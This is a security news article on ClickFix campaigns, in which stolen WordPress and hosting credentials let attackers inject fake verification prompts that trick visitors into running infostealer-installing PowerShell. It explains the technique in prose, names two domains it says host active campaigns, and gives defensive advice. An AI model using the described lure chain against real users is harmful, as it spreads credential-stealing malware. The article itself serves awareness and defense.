Stolen Credentials Fuel Self-Sustaining Malware Distribution

A dangerous feedback loop has emerged in cybercrime operations: infostealers compromise business owners, steal their website credentials, and attackers then use those credentials to turn legitimate websites into malware distribution platforms—which deploy more infostealers, creating a self-sustaining cycle.

Research published this week by the Hudson Rock Threat Intelligence Team reveals the scale of this problem. Of 1,635 malicious domains tracked that were using the ClickFix technique, 220 were legitimate business websites whose administrative credentials appeared in infostealer logs. That's 13% of active malware distribution infrastructure running on hijacked legitimate domains.

What Is ClickFix

ClickFix is a social engineering technique that tricks users into executing malicious code through their own actions. When victims visit a compromised website, they encounter what appears to be a Google reCAPTCHA verification or browser error message.

The fake prompt is convincing enough that many users follow its instructions. Behind the scenes, malicious JavaScript has already copied a PowerShell command to the victim's clipboard. The prompt then asks users to press Windows+R and paste a "verification code" using Ctrl+V.

What actually happens: the victim executes a PowerShell command that downloads and installs infostealer malware—Lumma, Vidar, or Stealc, typically. No exploits required. No zero-days needed. Just social engineering that works.

Microsoft's 2025 Digital Defense Report found ClickFix has become the most common initial access method, accounting for 47% of all initial compromise techniques observed. The technique has even been adopted by nation-state actors like North Korea's Lazarus group for targeted attacks against cryptocurrency companies.

How Legitimate Websites Get Compromised

The attack chain starts with an infected business owner or administrator. Infostealer malware harvests credentials stored in browsers, password managers, and application configuration files. Those credentials often include:

• WordPress admin panel logins
• cPanel and hosting control panel access
• CMS authentication tokens
• FTP and SSH credentials

Once attackers obtain administrative access, they inject ClickFix scripts into the legitimate website. Visitors see fake verification prompts, execute the malicious commands, and get infected themselves. Their credentials then enter the same infostealer ecosystem, potentially compromising more websites.

Hudson Rock documented specific examples:

jrqsistemas.com - Currently hosting an active ClickFix campaign. The site's WordPress administrator credentials were previously stolen by infostealer malware. Attackers used those valid credentials to upload malicious scripts.

wo.cementah.com - Same pattern. Harvested administrative credentials enabled unauthorized access for malware hosting.

Why This Matters

Compromised legitimate domains bypass many security controls that would block newly registered or obviously suspicious domains. Business websites build trust with email security gateways, web filters, and reputation systems over months or years. When those same domains start serving malware, they often sail through defenses.

The feedback loop also complicates takedown efforts. Traditional malware domains can be reported and blocked relatively quickly. But legitimate businesses may not realize their sites are compromised, may not have the technical expertise to remove malicious code, or may delay action to avoid disrupting their operations.

Every successful infection generates more credentials. More credentials mean more compromised websites. More compromised websites mean more distribution points for the same infostealers that started the cycle. Evasion tactics are getting creative across the board—GootLoader used over 1,000 ZIP archives to scatter payloads and dodge detection.

Who Is Getting Hit

Infostealers aren't picky about targets. Small businesses running WordPress sites without dedicated IT support make easy victims. But the credential harvesting affects organizations of all sizes—any administrator who gets infected potentially exposes their organization's web infrastructure.

According to Flashpoint data, information-stealing malware was responsible for 2.1 billion stolen credentials in 2024—75% of that year's total credential theft. Prolific strains like RisePro, StealC, and Lumma compromised 23 million hosts and devices. Lumma Stealer's operators went creative too, using a disguised 'Ninja Browser' and Google Groups for C2 communication.

The phishing techniques that deliver infostealers have also improved. Attackers use AI to craft convincing lures, exploit trusted platforms like Google Cloud to bypass email security, and time campaigns for maximum impact during holidays and weekends.

Breaking the Cycle

For businesses running websites:

1. Enable multi-factor authentication on all administrative interfaces. MFA won't help if the session is already hijacked, but it raises the bar significantly.

2. Monitor website file integrity. Services that detect unauthorized changes to site files can catch injected malware before it affects visitors.

3. Isolate administrative credentials. Don't log into website admin panels from the same browser or machine used for general work. Consider dedicated admin workstations or virtual machines.

4. Audit admin accounts. Remove accounts for employees who've left. Check for unauthorized accounts that may have been created by attackers.

For users:

Never run commands or scripts copied from websites. Legitimate verification processes don't ask you to open Run dialogs or paste clipboard contents. Any prompt requesting this is almost certainly malicious.

The 220 compromised domains Hudson Rock identified represent just what's currently visible. The actual number of legitimate websites serving malware is certainly higher—and growing with every successful infostealer infection.